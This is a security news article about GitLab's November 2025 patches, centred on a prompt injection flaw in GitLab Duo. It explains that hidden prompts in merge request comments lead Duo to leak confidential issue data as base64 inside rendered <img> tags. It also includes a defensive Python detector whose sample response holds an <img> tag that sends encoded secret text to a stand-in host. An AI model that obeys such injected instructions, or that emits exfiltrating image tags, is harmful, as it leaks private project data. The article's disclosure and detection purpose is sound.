Tuesday, March 17, 2026

Multiple GitLab Vulnerabilities Enable Prompt Injection Attacks Leading To Sensitive Data Exposure

On November 12, 2025, GitLab released critical patch versions 18.5.2, 18.4.4, and 18.3.6 for both Community Edition (CE) and Enterprise Edition (EE), addressing a series of security flaws that could expose sensitive data through prompt injection and other vectors.

These updates fix nine vulnerabilities, including a low-severity but insidious prompt-injection issue in GitLab Duo that allows authenticated users to manipulate AI-driven code reviews and leak confidential information.

Organizations running affected versions are urged to upgrade immediately to mitigate risks, such as data exfiltration from private projects and other issues.

GitLab.com has already been patched; Dedicated customers require no action, but self-managed instances may experience downtime during upgrades.

The release highlights GitLab’s commitment to rapid response, with vulnerabilities disclosed publicly 30 days post-patch via their issue tracker.

Among the fixes, prompt injection stands out due to its implications for AI-assisted development workflows, where hidden malicious instructions can hijack responses and embed exploitable elements.

This batch also includes high-severity cross-site scripting (XSS) in the Kubernetes proxy and medium-severity authorization bypasses, amplifying the urgency for updates across versions dating back to 13.2.

Unpacking The Prompt Injection Flaw

The core vulnerability, CVE-2025-6945, affects GitLab Duo’s review feature in EE versions from 17.9 up to but not including the patched releases, with a CVSS score of 3.5 indicating low severity but real-world potential for harm.

Authenticated users can inject hidden prompts into merge request comments, tricking the AI into extracting and leaking sensitive data from confidential issues, such as internal discussions or zero-day vulnerability details.

This indirect prompt injection exploits Duo’s inadequate input sanitization, allowing attackers to embed instructions that manipulate outputs, such as base64-encoded data exfiltrated via rendered HTML elements, including malicious <img> tags.

In practice, an attacker might poison a public merge request description with a concealed prompt, which then influences a victim’s interaction with Duo Chat, leading to source code theft or redirection to phishing sites.
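The output side of this path can be checked before an AI response is rendered. The Python below is an added example, not GitLab's code or its fix: it flags elements in a response that point at hosts outside an allowlist and records whether the URL carries a base64 token that decodes to text. `ALLOWED_HOSTS`, the host names, and the sample response are constructed assumptions.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: the only host this instance should load resources from.
ALLOWED_HOSTS = {"gitlab.example.com"}
URL_ATTRS = {"src", "href", "poster", "data"}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/_-]{24,}")

def decodes_to_text(token):
    """True if token is base64 (standard or URL-safe) of valid UTF-8 text."""
    std = token.replace("-", "+").replace("_", "/")
    std += "=" * (-len(std) % 4)
    try:
        base64.b64decode(std, validate=True).decode("utf-8")
        return True
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return False

class RemoteLoadFinder(HTMLParser):
    """Records elements whose URL attribute points outside ALLOWED_HOSTS."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name not in URL_ATTRS or not value:
                continue
            parts = urlsplit(value.strip())
            if parts.hostname is None or parts.hostname in ALLOWED_HOSTS:
                continue  # relative URL or allowlisted host
            tokens = B64_TOKEN.findall(parts.path + "?" + parts.query)
            self.findings.append({"tag": tag, "host": parts.hostname,
                                  "encoded_payload": any(map(decodes_to_text, tokens))})

def inspect_ai_response(html):
    """Return findings for an AI response that is about to be rendered."""
    finder = RemoteLoadFinder()
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample: a response with one relative and one external image.
SECRET = base64.b64encode(b"constructed text from a confidential issue").decode()
SAMPLE = ('<p>Review: looks fine.</p><img src="/uploads/diagram.png">'
          f'<img src="https://collector.example.net/p.png?d={SECRET}">')
```

A finding with `encoded_payload` set is a reason to withhold the render and raise an alert; an external link without one may only need logging.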

Reported by researcher Rogerace via HackerOne, this flaw underscores broader risks in AI tools, where prompt leakage can reveal system instructions, permissions, and filtering mechanisms, enabling further exploits like data breaches or regulatory violations.

Earlier incidents, such as those detailed by Legit Security in May 2025, demonstrated similar attacks on Duo, highlighting how AI’s access to project artifacts amplifies threats beyond traditional code review.

Complementing this, related information disclosure issues such as CVE-2025-7000 and CVE-2025-2615 enable unauthorized views of branch names and GraphQL data, potentially chaining with prompt injection to escalate data exposure.

These flaws affect CE/EE from 16.7 and 17.6, respectively, allowing blocked or low-privilege users to bypass controls via WebSocket subscriptions or issue access.

CVSS scores of 4.3 reflect a moderate impact. However, when combined with AI manipulation, they could facilitate targeted reconnaissance in enterprise environments.

Broader Security Patches and Mitigation Steps

Beyond prompt injection, the patches address a high-severity XSS in the Kubernetes proxy (CVE-2025-11224, CVSS 7.7), where improper input validation lets authenticated users execute scripts under specific conditions, impacting versions from 15.10.

An incorrect authorization flaw in workflows (CVE-2025-11865, CVSS 6.5) allows users to tamper with others’ Duo flows, discovered internally by GitLab’s Dylan Griffith.

Lower-severity fixes include path traversal in branch names (CVE-2025-11990), an access control bypass in Pages (CVE-2025-7736), and a DoS via crafted markdown (CVE-2025-12983), all of which remediate authenticated abuse vectors.

Additional updates include upgrading libxslt to 1.1.43 to fix CVEs such as CVE-2024-55549, as well as various bug fixes and, for stability, upgrades of Rack to 2.2.20 and Redis to 7.2.11.

Upgrading may involve post-deploy migrations, which can cause downtime on single-node setups.

However, zero-downtime procedures apply to multi-node setups via Helm or Omnibus.

GitLab recommends following best practices, such as enabling Duo prompt guardrails and monitoring for anomalous AI interactions, to prevent future exploits.

Varshini
Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.
